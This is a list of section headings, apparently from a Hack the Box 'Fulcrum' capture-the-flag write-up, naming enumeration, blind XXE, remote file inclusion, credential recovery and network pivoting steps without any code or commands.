Recovering Administrator AutoLogon Credentials

Getting System with PTH/PSEXEC

Hack the Box - Fulcrum Write up

Introduction

Tools Used

Enumeration

Initial Scanning

Enumerating Port 4

Enumerating Port 80

Enumering Port 88 (phpmyadmin)

Enumerating Port 9999 (PFSense)

Enumerating Port 56423 (FulCrum API)

Exploitation

Using Blind XXE to Read Source Code Files

Getting Shell via Remote File Include

Pivoting

Decrypting/Recovering Credentials in Script for PSRemoting

Discovering 192.168.122.x Network

Pivoting from Fulcrum Host to 192.168.122.x Network